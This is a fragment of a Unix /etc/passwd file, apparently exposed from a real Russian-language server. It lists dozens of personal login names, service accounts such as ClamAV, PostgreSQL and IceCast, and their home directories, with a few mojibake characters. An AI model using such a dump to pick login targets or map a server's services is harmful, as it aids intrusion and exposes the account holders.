б.р.:/home/veronica:/bin/sh helt:x:529:100:пМЕЗ:/home/helt:/bin/sh robert:x:530:100::/home/robert:/bin/sh luiza:x:531:100::/home/luiza:/bin/sh oleshka:x:532:100::/home/oleshka:/bin/sh rezeda:x:533:100::/home/rezeda:/bin/sh sergey:x:534:100::/home/sergey:/bin/sh sever:x:535:100::/home/sever:/bin/sh abn:x:536:100::/home/abn:/bin/sh iserverd:x:537:505::/home/iserverd:/bin/sh chistya:x:538:100::/home/chistya:/bin/sh angela:x:539:100::/home/angela:/bin/sh ashotik:x:540:100::/home/ashotik:/bin/sh igor:x:541:100::/home/igor:/bin/sh katerina:x:542:100::/home/katerina:/bin/sh vlad:x:543:100::/home/vlad:/bin/sh kane:x:544:100::/home/kane:/bin/sh xdamirx:x:545:100::/home/xdamirx:/bin/sh polaris:x:546:100::/home/polaris:/bin/sh albert:x:547:100::/home/albert:/bin/sh air:x:548:100::/home/air:/bin/sh bruise:x:549:100::/home/bruise:/bin/sh biks:x:550:100::/home/biks:/bin/sh alternativa:x:551:100::/home/alternativa:/bin/sh dinar:x:552:100::/home/dinar:/bin/sh arturguzalia:x:553:100::/home/arturguzalia:/bin/sh halgrim:x:554:100::/home/halgrim:/bin/sh gainceva:x:555:100::/home/gainceva:/bin/sh mifor:x:556:100::/home/mifor:/bin/sh maviol:x:557:100::/home/maviol:/bin/sh sa-milt:x:104:110:SpamAssassin Milter:/var/run/spamass-milter:/sbin/nologin nikita:x:558:100::/home/nikita:/bin/sh leila:x:559:100:leila:/home/leila:/bin/sh clamav:x:105:111:Clam Anti Virus Checker:/var/clamav:/sbin/nologin mihail:x:514:100::/home/mihail:/bin/sh bill:x:503:100:billing:/home/bill:/bin/sh sony:x:560:100::/home/sony:/bin/sh anastasia:x:561:501::/home/anastasia:/bin/sh lartem:x:562:100::/home/lartem:/bin/sh naelsi:x:563:100::/home/naelsi:/bin/sh eliza:x:564:100::/home/eliza:/bin/sh yulia:x:565:100::/home/yulia:/bin/sh vibro:x:566:100::/home/vibro:/bin/sh vaisovna:x:567:100::/home/vaisovna:/bin/sh ildar:x:568:100::/home/ildar:/bin/sh uliya:x:569:100::/home/uliya:/bin/sh support:x:570:100::/home/support:/bin/sh aetrik:x:571:100::/home/aetrik:/bin/sh design:x:572:100::/home/design:/bin/sh icecast:x:573:517:IceCast Server:/usr/local/share/icecast:/sbin/nologin victoria:x:574:100::/home/victoria:/bin/sh shalun73:x:575:100::/home/shalun73:/bin/sh local:x:576:100::/home/local:/bin/sh nukhov:x:577:100::/home/nukhov:/bin/sh named:x:25:25:Named:/var/named:/sbin/nologin evgeniyklepcov:x:578:100::/home/evgeniyklepcov:/bin/sh postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash romeo:x:579:100::/home/romeo:/bin/sh inna:x:580:100::/home/inna:/bin/sh lipatov:x:581:100::/home/lipatov:/bin/sh znaki:x:582:100::/home/znaki:/bin/sh isaeva:x:583:100::/home/isaeva:/bin/sh blacksun:x:584:100::/home/blacksun:/bin/sh hamzin:x:585:509::/home/hamzin:/bin/sh lilya:x:586:100::/home/lilya:/bin/sh aidunov:x:587:100::/home/aidunov:/bin/sh andreevs:x:588:100::/home/andreevs:/bin/sh aniufa:x:589:48::/var/www/aniufa:/bin/sh olesya:x:590:100::/home/olesya:/bin/sh